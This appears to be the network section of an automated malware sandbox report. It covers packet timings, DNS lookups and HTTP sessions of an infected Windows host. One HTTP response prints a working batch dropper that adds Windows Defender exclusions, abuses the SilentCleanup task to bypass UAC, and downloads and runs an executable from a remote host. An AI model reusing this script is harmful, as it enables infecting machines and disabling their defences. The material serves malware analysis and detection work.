                                                        Jan 8, 2021 09:08:32.358052969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358072996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358083963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358103991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358105898 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.358119011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358136892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.358138084 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.358160019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.359000921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.359076023 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.383764029 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383791924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383814096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383836031 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383861065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383883953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383904934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383915901 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.383924961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383934021 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.383945942 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.383948088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383970976 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.383991957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384006023 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.384013891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384799957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384825945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384845972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384860039 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.384870052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384882927 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.384901047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384922981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.384938955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.385749102 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385776043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385796070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385818958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385829926 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.385842085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385864973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.385876894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.385906935 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.386656046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395766973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395796061 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395822048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395845890 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395844936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.395868063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395884037 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.395890951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395912886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395934105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395953894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395968914 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.395973921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.395993948 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.396001101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.396024942 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.396044970 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.397094011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397120953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397142887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397162914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397173882 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.397185087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397205114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397265911 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.397938013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397964954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.397985935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.398005962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.398005962 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.398030043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.398055077 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.398067951 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.398912907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.398977995 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400146008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400173903 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400197029 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400208950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400222063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400244951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400253057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400269032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400302887 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400590897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400615931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400638103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400651932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400660038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400681973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400690079 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400706053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400743008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.401525021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409790039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409822941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409841061 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409857035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409882069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409903049 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409910917 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.409934044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410195112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410218000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410239935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410240889 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410260916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410280943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410281897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410306931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410320044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411160946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411183119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411206007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411215067 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411228895 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411251068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411268950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411273003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411313057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412069082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412095070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412115097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412137032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412137985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412163019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412178040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412187099 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412225962 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413041115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413065910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413086891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413106918 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413108110 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413129091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413144112 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413151026 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413187027 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413990021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414015055 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414036036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414055109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414071083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414088964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414117098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.414990902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.415040970 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416465998 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416490078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416512012 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416529894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416538000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416563034 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416582108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416589975 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416621923 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416881084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416904926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416925907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416944981 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416946888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416970015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416989088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416990042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.417032957 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.417820930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420607090 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420631886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420651913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420672894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420681000 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.420695066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420711994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.420720100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420762062 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421031952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421092033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421117067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421138048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421139956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421163082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421183109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421183109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421224117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.422110081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589546919 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589581966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589678049 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.589709044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589735031 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589759111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589781046 CET49177443192.168.2.22104.18.58.219

                                                        UDP Packets


                                                        DNS Queries


                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 8, 2021 09:06:06.952363014 CET | 8.8.8.8 | 192.168.2.22 | 0xd78f | No error (0) | cutt.ly |  | 104.22.1.232 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:06.952363014 CET | 8.8.8.8 | 192.168.2.22 | 0xd78f | No error (0) | cutt.ly |  | 172.67.8.238 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:06.952363014 CET | 8.8.8.8 | 192.168.2.22 | 0xd78f | No error (0) | cutt.ly |  | 104.22.0.232 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET | 8.8.8.8 | 192.168.2.22 | 0x1192 | No error (0) | cutt.ly |  | 104.22.1.232 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET | 8.8.8.8 | 192.168.2.22 | 0x1192 | No error (0) | cutt.ly |  | 172.67.8.238 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET | 8.8.8.8 | 192.168.2.22 | 0x1192 | No error (0) | cutt.ly |  | 104.22.0.232 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:19.493421078 CET | 8.8.8.8 | 192.168.2.22 | 0x4317 | No error (0) | chebo.discountmonumentcenter.com |  | 192.185.194.191 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:24.923634052 CET | 8.8.8.8 | 192.168.2.22 | 0xefb6 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:25.002636909 CET | 8.8.8.8 | 192.168.2.22 | 0x3f32 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:51.282998085 CET | 8.8.8.8 | 192.168.2.22 | 0xc52e | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:06:51.382138014 CET | 8.8.8.8 | 192.168.2.22 | 0x8c7b | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:07:17.591433048 CET | 8.8.8.8 | 192.168.2.22 | 0x5a45 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:07:17.659508944 CET | 8.8.8.8 | 192.168.2.22 | 0xeacf | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:07:43.810369015 CET | 8.8.8.8 | 192.168.2.22 | 0xaf2a | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:07:43.890265942 CET | 8.8.8.8 | 192.168.2.22 | 0xa4a6 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:10.042922974 CET | 8.8.8.8 | 192.168.2.22 | 0x78c7 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:10.112701893 CET | 8.8.8.8 | 192.168.2.22 | 0x9788 | No error (0) | telete.in |  | 195.201.225.248 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET | 8.8.8.8 | 192.168.2.22 | 0xc5e | No error (0) | trashbininspector.fun |  | 104.18.58.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET | 8.8.8.8 | 192.168.2.22 | 0xc5e | No error (0) | trashbininspector.fun |  | 172.67.166.210 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET | 8.8.8.8 | 192.168.2.22 | 0xc5e | No error (0) | trashbininspector.fun |  | 104.18.59.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET | 8.8.8.8 | 192.168.2.22 | 0x1e1f | No error (0) | trashbininspector.fun |  | 104.18.58.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET | 8.8.8.8 | 192.168.2.22 | 0x1e1f | No error (0) | trashbininspector.fun |  | 172.67.166.210 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET | 8.8.8.8 | 192.168.2.22 | 0x1e1f | No error (0) | trashbininspector.fun |  | 104.18.59.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET | 8.8.8.8 | 192.168.2.22 | 0xff23 | No error (0) | trashbininspector.fun |  | 104.18.58.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET | 8.8.8.8 | 192.168.2.22 | 0xff23 | No error (0) | trashbininspector.fun |  | 172.67.166.210 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET | 8.8.8.8 | 192.168.2.22 | 0xff23 | No error (0) | trashbininspector.fun |  | 104.18.59.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET | 8.8.8.8 | 192.168.2.22 | 0x8f4f | No error (0) | trashbininspector.fun |  | 104.18.58.219 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET | 8.8.8.8 | 192.168.2.22 | 0x8f4f | No error (0) | trashbininspector.fun |  | 172.67.166.210 | A (IP address) | IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET | 8.8.8.8 | 192.168.2.22 | 0x8f4f | No error (0) | trashbininspector.fun |  | 104.18.59.219 | A (IP address) | IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 37.46.150.139
                                                        • chebo.discountmonumentcenter.com

                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 37.46.150.139 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 8, 2021 09:06:11.405921936 CET | 72 | OUT | GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1
                                                        Host: 37.46.150.139
                                                        Connection: Keep-Alive
Jan 8, 2021 09:06:11.458991051 CET | 73 | IN | HTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:11 GMT
                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                        Last-Modified: Mon, 04 Jan 2021 21:26:11 GMT
                                                        ETag: "7d0-5b819bd338a68"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 2000
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-msdownload
Data Ascii:
mode 18,1
color FE
setlocal
for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j
if "%version%" == "10.0" ( echo "Windows 10 detected"
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nul
timeout /t 2 >nul
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
timeout /t 3 >nul
reg delete "HKCU\Environment" /v "windir" /F
)
if "%version%" == "6.3" ( echo "Windows 8.1 detected"
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Proces
Jan 8, 2021 09:06:11.459027052 CET | 74 | IN |
Data Ascii:
s $env:appdata\cr.exe;&REM " >nul
timeout /t 2 >nul
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
timeout /t 3 >nul
reg delete "HKCU\Environment" /v "windir" /F
)
if "%version%" == "6.2" ( echo "Windows 8 detecte


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49169 | 192.185.194.191 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 8, 2021 09:06:19.652738094 CET | 81 | OUT | GET /vantuz_2021.exe HTTP/1.1
                                                        Host: chebo.discountmonumentcenter.com
                                                        Connection: Keep-Alive
Jan 8, 2021 09:06:19.814476967 CET | 82 | IN | HTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:19 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, Keep-Alive
                                                        Last-Modified: Mon, 04 Jan 2021 21:24:49 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 565248
                                                        Keep-Alive: timeout=5, max=75
                                                        Content-Type: application/x-msdownload


                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jan 8, 2021 09:06:07.078320026 CET | 104.22.1.232 | 443 | 192.168.2.22 | 49165 | CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017 | Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 |  |  |  |  | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027 |  |
Jan 8, 2021 09:06:18.773220062 CET | 104.22.1.232 | 443 | 192.168.2.22 | 49168 | CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017 | Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 |  |  |  |  | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027 |  |
Jan 8, 2021 09:08:10.254141092 CET | 195.201.225.248 | 443 | 192.168.2.22 | 49174 | CN=telecut.in CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Dec 19 08:52:17 CET 2020 Wed Oct 07 21:21:40 CEST 2020 | Fri Mar 19 08:52:17 CET 2021 Wed Sep 29 21:21:40 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 |  |  |  |  | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 |  |
